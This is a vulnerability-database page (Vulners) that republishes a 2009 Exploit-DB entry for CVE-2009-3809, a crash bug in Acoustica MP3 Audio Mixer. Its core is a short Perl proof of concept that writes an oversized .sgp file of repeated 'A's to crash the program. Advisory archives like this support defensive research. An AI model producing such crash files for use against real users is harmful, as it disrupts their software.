Lucene search
+L

Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash

🗓️ 20 Jul 2009 00:00:00Reported by prodigyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

Acoustica MP3 Audio Mixer 2.471 crash vulnerability exploi

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-3809
20 Jul 200900:00
circl
cve
CVE
CVE-2009-3809
27 Oct 200916:00
cve
cvelist
Cvelist
CVE-2009-3809
27 Oct 200916:00
cvelist
euvd
EUVD
EUVD-2009-3781
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-3809
27 Oct 200916:30
nvd
prion
Prion
Design/Logic Flaw
27 Oct 200916:30
prion
#!/usr/bin/perl -w
#
# Acoustica MP3 Audio Mixer 1.0 (.sgp file) Crash Vulnerability Exploit
#
# Founded and exploited by prodigy
#
# Contact: [email protected]
#
# Vendor: www.acoustica.com
#
# Usage to reproduce the bug: when you created the malicious file, open it from the menu of the program and booom!!
#
# Platform: Windows
#
###################################################################

==PoC==

use strict;

use diagnostics;

my $file= "crash.sgp";

my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

print "File Created successfully\n";

==EndPoC==


##Greetz: Greetz myself for find the bug.

# milw0rm.com [2009-07-20]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jul 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.02284
28